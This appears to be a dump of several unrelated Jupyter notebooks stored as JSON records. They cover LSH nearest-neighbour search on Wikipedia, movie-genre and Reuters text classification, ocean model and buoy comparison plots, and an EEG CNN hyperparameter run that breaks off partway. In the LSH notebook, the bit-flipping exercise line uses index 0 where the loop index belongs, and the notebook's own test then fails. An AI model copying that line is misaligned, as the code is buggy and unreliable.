13, 15)\n(4, 14, 15)\n(5, 6, 7)\n(5, 6, 8)\n(5, 6, 9)\n(5, 6, 10)\n(5, 6, 11)\n(5, 6, 12)\n(5, 6, 13)\n(5, 6, 14)\n(5, 6, 15)\n(5, 7, 8)\n(5, 7, 9)\n(5, 7, 10)\n(5, 7, 11)\n(5, 7, 12)\n(5, 7, 13)\n(5, 7, 14)\n(5, 7, 15)\n(5, 8, 9)\n(5, 8, 10)\n(5, 8, 11)\n(5, 8, 12)\n(5, 8, 13)\n(5, 8, 14)\n(5, 8, 15)\n(5, 9, 10)\n(5, 9, 11)\n(5, 9, 12)\n(5, 9, 13)\n(5, 9, 14)\n(5, 9, 15)\n(5, 10, 11)\n(5, 10, 12)\n(5, 10, 13)\n(5, 10, 14)\n(5, 10, 15)\n(5, 11, 12)\n(5, 11, 13)\n(5, 11, 14)\n(5, 11, 15)\n(5, 12, 13)\n(5, 12, 14)\n(5, 12, 15)\n(5, 13, 14)\n(5, 13, 15)\n(5, 14, 15)\n(6, 7, 8)\n(6, 7, 9)\n(6, 7, 10)\n(6, 7, 11)\n(6, 7, 12)\n(6, 7, 13)\n(6, 7, 14)\n(6, 7, 15)\n(6, 8, 9)\n(6, 8, 10)\n(6, 8, 11)\n(6, 8, 12)\n(6, 8, 13)\n(6, 8, 14)\n(6, 8, 15)\n(6, 9, 10)\n(6, 9, 11)\n(6, 9, 12)\n(6, 9, 13)\n(6, 9, 14)\n(6, 9, 15)\n(6, 10, 11)\n(6, 10, 12)\n(6, 10, 13)\n(6, 10, 14)\n(6, 10, 15)\n(6, 11, 12)\n(6, 11, 13)\n(6, 11, 14)\n(6, 11, 15)\n(6, 12, 13)\n(6, 12, 14)\n(6, 12, 15)\n(6, 13, 14)\n(6, 13, 15)\n(6, 14, 15)\n(7, 8, 9)\n(7, 8, 10)\n(7, 8, 11)\n(7, 8, 12)\n(7, 8, 13)\n(7, 8, 14)\n(7, 8, 15)\n(7, 9, 10)\n(7, 9, 11)\n(7, 9, 12)\n(7, 9, 13)\n(7, 9, 14)\n(7, 9, 15)\n(7, 10, 11)\n(7, 10, 12)\n(7, 10, 13)\n(7, 10, 14)\n(7, 10, 15)\n(7, 11, 12)\n(7, 11, 13)\n(7, 11, 14)\n(7, 11, 15)\n(7, 12, 13)\n(7, 12, 14)\n(7, 12, 15)\n(7, 13, 14)\n(7, 13, 15)\n(7, 14, 15)\n(8, 9, 10)\n(8, 9, 11)\n(8, 9, 12)\n(8, 9, 13)\n(8, 9, 14)\n(8, 9, 15)\n(8, 10, 11)\n(8, 10, 12)\n(8, 10, 13)\n(8, 10, 14)\n(8, 10, 15)\n(8, 11, 12)\n(8, 11, 13)\n(8, 11, 14)\n(8, 11, 15)\n(8, 12, 13)\n(8, 12, 14)\n(8, 12, 15)\n(8, 13, 14)\n(8, 13, 15)\n(8, 14, 15)\n(9, 10, 11)\n(9, 10, 12)\n(9, 10, 13)\n(9, 10, 14)\n(9, 10, 15)\n(9, 11, 12)\n(9, 11, 13)\n(9, 11, 14)\n(9, 11, 15)\n(9, 12, 13)\n(9, 12, 14)\n(9, 12, 15)\n(9, 13, 14)\n(9, 13, 15)\n(9, 14, 15)\n(10, 11, 12)\n(10, 11, 13)\n(10, 11, 14)\n(10, 11, 15)\n(10, 12, 13)\n(10, 12, 14)\n(10, 12, 15)\n(10, 13, 14)\n(10, 13, 15)\n(10, 14, 15)\n(11, 12, 13)\n(11, 12, 14)\n(11, 12, 15)\n(11, 13, 14)\n(11, 13, 15)\n(11, 14, 15)\n(12, 13, 14)\n(12, 13, 15)\n(12, 14, 15)\n(13, 14, 15)\n" ], [ "def search_nearby_bins(query_bin_bits, 
table, search_radius=2, initial_candidates=set()):\n \"\"\"\n For a given query vector and trained LSH model, return all candidate neighbors for\n the query among all bins within the given search radius.\n \n Example usage\n -------------\n >>> model = train_lsh(corpus, num_vector=16, seed=143)\n >>> q = model['bin_index_bits'][0] # vector for the first document\n \n >>> candidates = search_nearby_bins(q, model['table'])\n \"\"\"\n num_vector = len(query_bin_bits)\n powers_of_two = 1 << np.arange(num_vector-1, -1, -1)\n \n # Allow the user to provide an initial set of candidates.\n candidate_set = deepcopy(initial_candidates)\n \n for different_bits in combinations(range(num_vector), search_radius): \n # Flip the bits (n_1,n_2,...,n_r) of the query bin to produce a new bit vector.\n ## Hint: you can iterate over a tuple like a list\n alternate_bits = deepcopy(query_bin_bits)\n for i in different_bits:\n alternate_bits[i] = 1-alternate_bits[0] # YOUR CODE HERE \n \n # Convert the new bit vector to an integer index\n nearby_bin = alternate_bits.dot(powers_of_two)\n \n # Fetch the list of documents belonging to the bin indexed by the new bit vector.\n # Then add those documents to candidate_set\n # Make sure that the bin exists in the table!\n # Hint: update() method for sets lets you add an entire list to the set\n if nearby_bin in table:\n candidate_set.update(table[nearby_bin])# YOUR CODE HERE: Update candidate_set with the documents in this bin.\n \n return candidate_set", "_____no_output_____" ], [ "obama_bin_index = model['bin_index_bits'][35817] # bin index of Barack Obama\ncandidate_set = search_nearby_bins(obama_bin_index, model['table'], search_radius=0)\nif candidate_set == set([35817, 21426, 53937, 39426, 50261]):\n print('Passed test')\nelse:\n print('Check your code')\nprint('List of documents in the same bin as Obama: 35817, 21426, 53937, 39426, 50261')", "Passed test\nList of documents in the same bin as Obama: 35817, 21426, 53937, 39426, 50261\n" ], [ "candidate_set = search_nearby_bins(obama_bin_index, model['table'], search_radius=1, initial_candidates=candidate_set)\nif candidate_set == set([39426, 38155, 38412, 28444, 9757, 41631, 39207, 59050, 47773, 53937, 21426, 34547,\n 23229, 55615, 39877, 27404, 33996, 21715, 50261, 21975, 33243, 58723, 35817, 45676,\n 19699, 2804, 20347]):\n print('Passed test')\nelse:\n print('Check your code')", "Check your code\n" ], [ "def query(vec, model, k, max_search_radius):\n \n data = model['data']\n table = model['table']\n random_vectors = model['random_vectors']\n num_vector = random_vectors.shape[1]\n \n \n # Compute bin index for the query vector, in bit representation.\n bin_index_bits = (vec.dot(random_vectors) >= 0).flatten()\n \n # Search nearby bins and collect candidates\n candidate_set = set()\n for search_radius in range(max_search_radius+1):\n candidate_set = search_nearby_bins(bin_index_bits, table, search_radius, initial_candidates=candidate_set)\n \n # Sort candidates by their true distances from the query\n nearest_neighbors = pd.DataFrame({'id':list(candidate_set)})\n candidates = data[np.array(list(candidate_set)),:]\n nearest_neighbors['distance'] = pairwise_distances(candidates, vec, metric='cosine').flatten()\n \n return nearest_neighbors.nsmallest(k,'distance',)[['id','distance']], len(candidate_set)", "_____no_output_____" ], [ "query(corpus[35817,:], model, k=10, max_search_radius=3)", "_____no_output_____" ], [ "query(corpus[35817,:], model, k=10, max_search_radius=3)[0].set_index('id').join(wiki[['name']], 
how='inner').sort_values('distance')", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb1e51ba4ba4f7b49aea3c1ccfc03897cb667ff2
12,145
ipynb
Jupyter Notebook
finalProject/ExampleTextRF.ipynb
Tionick/AppliedDeepLearningClass
3be1bdf666d7c2704284898e9c43ffca1078b61a
[ "MIT" ]
33
2018-06-06T19:38:06.000Z
2021-10-19T13:59:45.000Z
finalProject/ExampleTextRF.ipynb
Tionick/AppliedDeepLearningClass
3be1bdf666d7c2704284898e9c43ffca1078b61a
[ "MIT" ]
null
null
null
finalProject/ExampleTextRF.ipynb
Tionick/AppliedDeepLearningClass
3be1bdf666d7c2704284898e9c43ffca1078b61a
[ "MIT" ]
30
2018-06-06T22:59:15.000Z
2022-01-02T01:18:37.000Z
27.983871
526
0.466529
[ [ [ "import pandas as pd\nimport os\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.ensemble import RandomForestRegressor, RandomForestClassifier\nfrom sklearn.metrics import r2_score, roc_auc_score\nfrom sklearn.model_selection import train_test_split", "_____no_output_____" ] ], [ [ "# Read Data", "_____no_output_____" ] ], [ [ "path = ''", "_____no_output_____" ], [ "dataTraining = pd.read_csv(os.path.join(path, 'data', 'dataTraining.csv'), encoding='UTF-8', index_col=0)\ndataTesting = pd.read_csv(os.path.join(path, 'data', 'dataTesting.csv'), encoding='UTF-8', index_col=0)", "_____no_output_____" ], [ "dataTesting.head()", "_____no_output_____" ], [ "dataTesting.head()", "_____no_output_____" ] ], [ [ "# Create count vectorizer with ngrams", "_____no_output_____" ] ], [ [ "vect = CountVectorizer(ngram_range=(1, 2), max_features=1000)\nX_dtm = vect.fit_transform(dataTraining['plot'])\nX_dtm.shape", "_____no_output_____" ], [ "print(vect.get_feature_names()[:50])", "['able', 'able to', 'about', 'about the', 'about to', 'accident', 'across', 'act', 'action', 'actually', 'affair', 'after', 'after the', 'again', 'against', 'against the', 'age', 'agent', 'ago', 'alex', 'alive', 'all', 'all of', 'all the', 'alone', 'along', 'along the', 'along with', 'already', 'also', 'although', 'always', 'america', 'american', 'among', 'an', 'an old', 'and', 'and has', 'and he', 'and her', 'and his', 'and is', 'and she', 'and that', 'and the', 'and their', 'and then', 'and they', 'and when']\n" ] ], [ [ "# Create y", "_____no_output_____" ] ], [ [ "dataTraining['genres'] = dataTraining['genres'].map(lambda x: eval(x))\n\nle = MultiLabelBinarizer()\ny_genres = le.fit_transform(dataTraining['genres'])", "_____no_output_____" ] ], [ [ "# Split train and test", "_____no_output_____" ] ], [ [ "X_train, X_test, y_train_genres, y_test_genres = train_test_split(X_dtm, y_genres, test_size=0.33, random_state=42)", "_____no_output_____" ] ], [ [ "# Train multi-class multi-label model", "_____no_output_____" ] ], [ [ "clf = OneVsRestClassifier(RandomForestClassifier(n_jobs=-1, n_estimators=100, max_depth=10, random_state=42))", "_____no_output_____" ], [ "clf.fit(X_train, y_train_genres)", "_____no_output_____" ], [ "y_pred_genres = clf.predict_proba(X_test)", "_____no_output_____" ], [ "roc_auc_score(y_test_genres, y_pred_genres, average='macro')", "_____no_output_____" ] ], [ [ "# Apply models to kaggle test", "_____no_output_____" ] ], [ [ "X_test_dtm = vect.transform(dataTesting['plot'])\n\ncols = ['p_Action', 'p_Adventure', 'p_Animation', 'p_Biography', 'p_Comedy', 'p_Crime', 'p_Documentary', 'p_Drama', 'p_Family',\n 'p_Fantasy', 'p_Film-Noir', 'p_History', 'p_Horror', 'p_Music', 'p_Musical', 'p_Mystery', 'p_News', 'p_Romance',\n 'p_Sci-Fi', 'p_Short', 'p_Sport', 'p_Thriller', 'p_War', 'p_Western']\n\ny_pred_test_genres = clf.predict_proba(X_test_dtm)\n\npd.DataFrame(y_pred_test_genres, index=dataTesting.index, columns=cols).to_csv('pred_genres_text_RF.csv', index_label='ID')", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code" ] ]
cb1e6eef9508c849c663561d62b96b1593662a35
5,315
ipynb
Jupyter Notebook
Classification_Reuters.ipynb
miguelmalvarez/reuters-tc
950930742c76ea5cac6d2005576ad99c820bafd5
[ "Apache-2.0" ]
7
2016-11-07T14:24:57.000Z
2018-02-10T17:11:17.000Z
Classification_Reuters.ipynb
miguelmalvarez/reuters-tc
950930742c76ea5cac6d2005576ad99c820bafd5
[ "Apache-2.0" ]
null
null
null
Classification_Reuters.ipynb
miguelmalvarez/reuters-tc
950930742c76ea5cac6d2005576ad99c820bafd5
[ "Apache-2.0" ]
null
null
null
34.070513
110
0.61524
[ [ [ "# Classification", "_____no_output_____" ] ], [ [ "from nltk.corpus import reuters\nimport spacy\nimport re\nimport numpy as np\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom sklearn.svm import LinearSVC\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.metrics import f1_score, precision_score, recall_score\nnlp = spacy.load(\"en_core_web_md\")\n\n\ndef tokenize(text):\n min_length = 3\n tokens = [word.lemma_ for word in nlp(text) if not word.is_stop]\n p = re.compile('[a-zA-Z]+');\n filtered_tokens = list(filter (lambda token: p.match(token) and len(token) >= min_length,tokens))\n return filtered_tokens \n\ndef represent_tfidf(train_docs, test_docs):\n representer = TfidfVectorizer(tokenizer=tokenize)\n # Learn and transform train documents\n vectorised_train_documents = representer.fit_transform(train_docs)\n vectorised_test_documents = representer.transform(test_docs) \n return vectorised_train_documents, vectorised_test_documents\n\ndef doc2vec(text):\n min_length = 3\n p = re.compile('[a-zA-Z]+')\n tokens = [token for token in nlp(text) if not token.is_stop and \n p.match(token.text) and \n len(token.text) >= min_length]\n doc = np.average([token.vector for token in tokens], axis=0)\n return doc\n\ndef represent_doc2vec(train_docs, test_docs):\n vectorised_train_documents = [doc2vec(doc) for doc in train_docs]\n vectorised_test_documents = [doc2vec(doc) for doc in test_docs]\n return vectorised_train_documents, vectorised_test_documents\n\ndef evaluate(test_labels, predictions):\n precision = precision_score(test_labels, predictions, average='micro')\n recall = recall_score(test_labels, predictions, average='micro')\n f1 = f1_score(test_labels, predictions, average='micro')\n print(\"Micro-average quality numbers\")\n print(\"Precision: {:.4f}, Recall: {:.4f}, F1-measure: {:.4f}\".format(precision, recall, f1))\n\n precision = precision_score(test_labels, predictions, average='macro')\n recall = recall_score(test_labels, predictions, average='macro')\n f1 = f1_score(test_labels, predictions, average='macro')\n\n print(\"Macro-average quality numbers\")\n print(\"Precision: {:.4f}, Recall: {:.4f}, F1-measure: {:.4f}\".format(precision, recall, f1))", "_____no_output_____" ], [ "documents = reuters.fileids()\n\ntrain_docs_id = list(filter(lambda doc: doc.startswith(\"train\"), documents))\ntest_docs_id = list(filter(lambda doc: doc.startswith(\"test\"), documents))\n\ntrain_docs = [reuters.raw(doc_id) for doc_id in train_docs_id]\ntest_docs = [reuters.raw(doc_id) for doc_id in test_docs_id]", "_____no_output_____" ], [ "# Transform multilabel labels\nmlb = MultiLabelBinarizer()\ntrain_labels = mlb.fit_transform([reuters.categories(doc_id) for doc_id in train_docs_id]) \ntest_labels = mlb.transform([reuters.categories(doc_id) for doc_id in test_docs_id])", "_____no_output_____" ], [ "# TFIDF Experiment\n\nmodel = OneVsRestClassifier(LinearSVC(random_state=42))\nvectorised_train_docs, vectorised_test_docs = represent_tfidf(train_docs, test_docs)\n\nmodel.fit(vectorised_train_docs, train_labels)\npredictions = model.predict(vectorised_test_docs)\nevaluate(test_labels, predictions)", "_____no_output_____" ], [ "# Embeddings Experiment\n\nmodel = OneVsRestClassifier(LinearSVC(random_state=42))\nvectorised_train_docs, vectorised_test_docs = represent_doc2vec(train_docs, test_docs)\n\nmodel.fit(vectorised_train_docs, train_labels)\npredictions = 
model.predict(vectorised_test_docs)\nevaluate(test_labels, predictions)", "_____no_output_____" ] ] ]
[ "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code", "code" ] ]
cb1e7038f2db13f9d5ac839ecc10e5b1269a2fda
368,574
ipynb
Jupyter Notebook
notebooks/Evaluations/Continuous_Timeseries/All_Depths_ORCA/Hansville/201905_Hindcast/2015_Hansville_Evaluations.ipynb
SalishSeaCast/analysis-keegan
64eb44809a6581c210d02087c11b92a382945529
[ "Apache-2.0" ]
null
null
null
notebooks/Evaluations/Continuous_Timeseries/All_Depths_ORCA/Hansville/201905_Hindcast/2015_Hansville_Evaluations.ipynb
SalishSeaCast/analysis-keegan
64eb44809a6581c210d02087c11b92a382945529
[ "Apache-2.0" ]
null
null
null
notebooks/Evaluations/Continuous_Timeseries/All_Depths_ORCA/Hansville/201905_Hindcast/2015_Hansville_Evaluations.ipynb
SalishSeaCast/analysis-keegan
64eb44809a6581c210d02087c11b92a382945529
[ "Apache-2.0" ]
null
null
null
401.496732
83,684
0.936271
[ [ [ "This notebook contains Hovmoller plots that compare the model output over many different depths to the results from the ORCA Buoy data. ", "_____no_output_____" ] ], [ [ "import sys\nsys.path.append('/ocean/kflanaga/MEOPAR/analysis-keegan/notebooks/Tools')", "_____no_output_____" ], [ "import numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport pandas as pd\nimport netCDF4 as nc\nimport xarray as xr\nimport datetime as dt\nfrom salishsea_tools import evaltools as et, viz_tools, places\nimport gsw \nimport matplotlib.gridspec as gridspec\nimport matplotlib as mpl\nimport matplotlib.dates as mdates\nimport cmocean as cmo\nimport scipy.interpolate as sinterp\nimport math\nfrom scipy import io\nimport pickle\nimport cmocean\nimport json\nimport Keegan_eval_tools as ket\nfrom collections import OrderedDict\nfrom matplotlib.colors import LogNorm\n\nfs=16\nmpl.rc('xtick', labelsize=fs)\nmpl.rc('ytick', labelsize=fs)\nmpl.rc('legend', fontsize=fs)\nmpl.rc('axes', titlesize=fs)\nmpl.rc('axes', labelsize=fs)\nmpl.rc('figure', titlesize=fs)\nmpl.rc('font', size=fs)\nmpl.rc('font', family='sans-serif', weight='normal', style='normal')\n\nimport warnings\n#warnings.filterwarnings('ignore')\nfrom IPython.display import Markdown, display\n\n%matplotlib inline", "_____no_output_____" ], [ "ptrcloc='/ocean/kflanaga/MEOPAR/savedData/201905_ptrc_data'\nmodver='HC201905' #HC202007 is the other option. \ngridloc='/ocean/kflanaga/MEOPAR/savedData/201905_grid_data'\nORCAloc='/ocean/kflanaga/MEOPAR/savedData/ORCAData'\nyear=2019\nmooring='Twanoh'", "_____no_output_____" ], [ "# Parameters\nyear = 2015\nmodver = \"HC201905\"\nmooring = \"Hansville\"\nptrcloc = \"/ocean/kflanaga/MEOPAR/savedData/201905_ptrc_data\"\ngridloc = \"/ocean/kflanaga/MEOPAR/savedData/201905_grid_data\"\nORCAloc = \"/ocean/kflanaga/MEOPAR/savedData/ORCAData\"\n", "_____no_output_____" ], [ "orca_dict=io.loadmat(f'{ORCAloc}/{mooring}.mat')", "_____no_output_____" ], [ "def ORCA_dd_to_dt(date_list):\n UTC=[]\n for yd in date_list:\n if np.isnan(yd) == True:\n UTC.append(float(\"NaN\"))\n else:\n start = dt.datetime(1999,12,31) \n delta = dt.timedelta(yd) \n offset = start + delta\n time=offset.replace(microsecond=0)\n UTC.append(time)\n return UTC", "_____no_output_____" ], [ "obs_tt=[]\nfor i in range(len(orca_dict['Btime'][1])):\n obs_tt.append(np.nanmean(orca_dict['Btime'][:,i]))\n#I should also change this obs_tt thing I have here into datetimes \nYD_rounded=[]\nfor yd in obs_tt:\n if np.isnan(yd) == True:\n YD_rounded.append(float(\"NaN\"))\n else:\n YD_rounded.append(math.floor(yd))\nobs_dep=[]\nfor i in orca_dict['Bdepth']:\n obs_dep.append(np.nanmean(i))", "<ipython-input-7-df801a97040c>:3: RuntimeWarning: Mean of empty slice\n obs_tt.append(np.nanmean(orca_dict['Btime'][:,i]))\n<ipython-input-7-df801a97040c>:13: RuntimeWarning: Mean of empty slice\n obs_dep.append(np.nanmean(i))\n" ], [ "grid=xr.open_mfdataset(gridloc+f'/ts_{modver}_{year}_{mooring}.nc')", "_____no_output_____" ], [ "tt=np.array(grid.time_counter)\nmod_depth=np.array(grid.deptht)\nmod_votemper=(grid.votemper.isel(y=0,x=0))\nmod_vosaline=(grid.vosaline.isel(y=0,x=0))\n\nmod_votemper = (np.array(mod_votemper))\nmod_votemper = np.ma.masked_equal(mod_votemper,0).T\nmod_vosaline = (np.array(mod_vosaline))\nmod_vosaline = np.ma.masked_equal(mod_vosaline,0).T", "_____no_output_____" ], [ "def Process_ORCA(orca_var,depths,dates,year):\n # Transpose the columns so that a yearday column can be added. 
\n df_1=pd.DataFrame(orca_var).transpose()\n df_YD=pd.DataFrame(dates,columns=['yearday'])\n df_1=pd.concat((df_1,df_YD),axis=1)\n #Group by yearday so that you can take the daily mean values. \n dfg=df_1.groupby(by='yearday')\n df_mean=dfg.mean()\n df_mean=df_mean.reset_index()\n # Convert the yeardays to datetime UTC\n UTC=ORCA_dd_to_dt(df_mean['yearday'])\n df_mean['yearday']=UTC\n # Select the range of dates that you would like. \n df_year=df_mean[(df_mean.yearday >= dt.datetime(year,1,1))&(df_mean.yearday <= dt.datetime(year,12,31))]\n df_year=df_year.set_index('yearday')\n #Add in any missing date values \n idx=pd.date_range(df_year.index[0],df_year.index[-1])\n df_full=df_year.reindex(idx,fill_value=-1)\n #Transpose again so that you can add a depth column. \n df_full=df_full.transpose()\n df_full['depth']=obs_dep\n # Remove any rows that have NA values for depth. \n df_full=df_full.dropna(how='all',subset=['depth'])\n df_full=df_full.set_index('depth')\n #Mask any NA values and any negative values. \n df_final=np.ma.masked_invalid(np.array(df_full))\n df_final=np.ma.masked_less(df_final,0)\n return df_final, df_full.index, df_full.columns", "_____no_output_____" ] ], [ [ "## Map of Buoy Location.", "_____no_output_____" ] ], [ [ "lon,lat=places.PLACES[mooring]['lon lat']\n\nfig, ax = plt.subplots(1,1,figsize = (6,6))\nwith nc.Dataset('/data/vdo/MEOPAR/NEMO-forcing/grid/bathymetry_201702.nc') as bathy:\n viz_tools.plot_coastline(ax, bathy, coords = 'map',isobath=.1)\ncolor=('firebrick')\nax.plot(lon, lat,'o',color = 'firebrick', label=mooring)\nax.set_ylim(47, 49)\nax.legend(bbox_to_anchor=[1,.6,0.45,0])\nax.set_xlim(-124, -122);\nax.set_title('Buoy Location');", "_____no_output_____" ] ], [ [ "## Temperature", "_____no_output_____" ] ], [ [ "df,dep,tim= Process_ORCA(orca_dict['Btemp'],obs_dep,YD_rounded,year)\ndate_range=(dt.datetime(year,1,1),dt.datetime(year,12,31))", "_____no_output_____" ], [ "ax=ket.hovmoeller(df,dep,tim,(2,15),date_range,title='Observed Temperature Series',\n var_title='Temperature (C$^0$)',vmax=23,vmin=8,cmap=cmo.cm.thermal)\n\nax=ket.hovmoeller(mod_votemper, mod_depth, tt, (2,15),date_range, title='Modeled Temperature Series',\n var_title='Temperature (C$^0$)',vmax=23,vmin=8,cmap=cmo.cm.thermal)", "/ocean/kflanaga/MEOPAR/analysis-keegan/notebooks/Tools/Keegan_eval_tools.py:816: UserWarning: 'set_params()' not defined for locator of type <class 'matplotlib.dates.AutoDateLocator'>\n plt.locator_params(axis=\"x\", nbins=20)\n" ] ], [ [ "# Salinity", "_____no_output_____" ] ], [ [ "df,dep,tim= Process_ORCA(orca_dict['Bsal'],obs_dep,YD_rounded,year)", "_____no_output_____" ], [ "ax=ket.hovmoeller(df,dep,tim,(2,15),date_range,title='Observed Absolute Salinity Series',\n var_title='SA (g/kg)',vmax=31,vmin=14,cmap=cmo.cm.haline)\n\nax=ket.hovmoeller(mod_vosaline, mod_depth, tt, (2,15),date_range,title='Modeled Absolute Salinity Series',\n var_title='SA (g/kg)',vmax=31,vmin=14,cmap=cmo.cm.haline)", "/ocean/kflanaga/MEOPAR/analysis-keegan/notebooks/Tools/Keegan_eval_tools.py:816: UserWarning: 'set_params()' not defined for locator of type <class 'matplotlib.dates.AutoDateLocator'>\n plt.locator_params(axis=\"x\", nbins=20)\n" ], [ "grid.close()", "_____no_output_____" ], [ "bio=xr.open_mfdataset(ptrcloc+f'/ts_{modver}_{year}_{mooring}.nc')", "_____no_output_____" ], [ 
"tt=np.array(bio.time_counter)\nmod_depth=np.array(bio.deptht)\nmod_flagellatets=(bio.flagellates.isel(y=0,x=0))\nmod_ciliates=(bio.ciliates.isel(y=0,x=0))\nmod_diatoms=(bio.diatoms.isel(y=0,x=0))\n\nmod_Chl = np.array((mod_flagellatets+mod_ciliates+mod_diatoms)*1.8)\nmod_Chl = np.ma.masked_equal(mod_Chl,0).T", "_____no_output_____" ], [ "df,dep,tim= Process_ORCA(orca_dict['Bfluor'],obs_dep,YD_rounded,year)", "_____no_output_____" ], [ "ax=ket.hovmoeller(df,dep,tim,(2,15),date_range,title='Observed Chlorophyll Series',\n var_title='Chlorophyll (mg Chl/m$^3$)',vmin=0,vmax=30,cmap=cmo.cm.algae)\n\nax=ket.hovmoeller(mod_Chl, mod_depth, tt, (2,15),date_range,title='Modeled Chlorophyll Series',\n var_title='Chlorophyll (mg Chl/m$^3$)',vmin=0,vmax=30,cmap=cmo.cm.algae)", "/ocean/kflanaga/MEOPAR/analysis-keegan/notebooks/Tools/Keegan_eval_tools.py:816: UserWarning: 'set_params()' not defined for locator of type <class 'matplotlib.dates.AutoDateLocator'>\n plt.locator_params(axis=\"x\", nbins=20)\n" ], [ "bio.close()", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb1e87f975e3e3a00a1f1d30df4edb09159baaf1
81,366
ipynb
Jupyter Notebook
CNNResults/project_cnn_full_hyperparam_run_20_12.ipynb
ruizhi92/EE239AS_Project
9b9bc46a45d75f4778ba945e1b6c6221276c4a35
[ "MIT" ]
15
2019-05-11T02:35:09.000Z
2022-03-22T09:17:28.000Z
CNNResults/project_cnn_full_hyperparam_run_20_12.ipynb
ruizhi92/EE239AS_Project
9b9bc46a45d75f4778ba945e1b6c6221276c4a35
[ "MIT" ]
1
2020-09-23T11:05:22.000Z
2020-09-23T13:40:01.000Z
CNNResults/project_cnn_full_hyperparam_run_20_12.ipynb
ruizhi92/EE239AS_Project
9b9bc46a45d75f4778ba945e1b6c6221276c4a35
[ "MIT" ]
9
2018-03-14T23:48:03.000Z
2022-02-05T13:13:16.000Z
240.727811
68,872
0.899626
[ [ [ "import torch\nimport torch.utils.data\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.optim as optim\nimport numpy as np\nimport h5py\nfrom data_utils import get_data\nimport matplotlib.pyplot as plt\nfrom solver_pytorch import Solver", "_____no_output_____" ], [ "# Load data from all .mat files, combine them, eliminate EOG signals, shuffle and \n# seperate training data, validation data and testing data.\n# Also do mean subtraction on x.\n\ndata = get_data('../project_datasets',num_validation=100, num_test=100)\nfor k in data.keys():\n print('{}: {} '.format(k, data[k].shape))", "X_train: (2358, 22, 1000) \ny_train: (2358,) \nX_val: (100, 22, 1000) \ny_val: (100,) \nX_test: (100, 22, 1000) \ny_test: (100,) \n" ], [ "# class flatten to connect to FC layer\nclass Flatten(nn.Module):\n def forward(self, x):\n N, C, H = x.size() # read in N, C, H\n return x.view(N, -1)", "_____no_output_____" ], [ "# turn x and y into torch type tensor\n\ndtype = torch.FloatTensor\n\nX_train = Variable(torch.Tensor(data.get('X_train'))).type(dtype)\ny_train = Variable(torch.Tensor(data.get('y_train'))).type(torch.IntTensor)\nX_val = Variable(torch.Tensor(data.get('X_val'))).type(dtype)\ny_val = Variable(torch.Tensor(data.get('y_val'))).type(torch.IntTensor)\nX_test = Variable(torch.Tensor(data.get('X_test'))).type(dtype)\ny_test = Variable(torch.Tensor(data.get('y_test'))).type(torch.IntTensor)", "_____no_output_____" ], [ "# train a 1D convolutional neural network\n# optimize hyper parameters\nbest_model = None\nparameters =[] # a list of dictionaries\nparameter = {} # a dictionary\nbest_params = {} # a dictionary\nbest_val_acc = 0.0\n\n# hyper parameters in model\nfilter_nums = [20]\n\nfilter_sizes = [12]\npool_sizes = [4]\n\n# hyper parameters in solver\nbatch_sizes = [100]\nlrs = [5e-4]\n\nfor filter_num in filter_nums:\n for filter_size in filter_sizes:\n for pool_size in pool_sizes:\n linear_size = int((X_test.shape[2]-filter_size)/4)+1\n linear_size = int((linear_size-pool_size)/pool_size)+1\n linear_size *= filter_num\n for batch_size in batch_sizes:\n for lr in lrs:\n model = nn.Sequential(\n nn.Conv1d(22, filter_num, kernel_size=filter_size, stride=4),\n nn.ReLU(inplace=True),\n nn.Dropout(p=0.5),\n nn.BatchNorm1d(num_features=filter_num),\n nn.MaxPool1d(kernel_size=pool_size, stride=pool_size),\n Flatten(),\n nn.Linear(linear_size, 20),\n nn.ReLU(inplace=True),\n nn.Linear(20, 4)\n )\n\n model.type(dtype)\n\n solver = Solver(model, data,\n lr = lr, batch_size=batch_size,\n verbose=True, print_every=50)\n\n solver.train()\n\n # save training results and parameters of neural networks\n parameter['filter_num'] = filter_num\n parameter['filter_size'] = filter_size\n parameter['pool_size'] = pool_size\n parameter['batch_size'] = batch_size\n parameter['lr'] = lr\n parameters.append(parameter)\n\n print('Accuracy on the validation set: ', solver.best_val_acc)\n print('parameters of the best model:')\n print(parameter)\n\n if solver.best_val_acc > best_val_acc:\n best_val_acc = solver.best_val_acc\n best_model = model\n best_solver = solver\n best_params = parameter\n \n\n", "(Iteration 1 / 1150) loss: 1.399668\n(Epoch 0 / 50) train acc: 0.260390; val_acc: 0.190000\n(Epoch 1 / 50) train acc: 0.365564; val_acc: 0.380000\n(Epoch 2 / 50) train acc: 0.420696; val_acc: 0.370000\n(Iteration 51 / 1150) loss: 1.267973\n(Epoch 3 / 50) train acc: 0.477523; val_acc: 0.380000\n(Epoch 4 / 50) train acc: 0.482188; val_acc: 0.390000\n(Iteration 101 / 1150) loss: 1.124447\n(Epoch 5 / 50) 
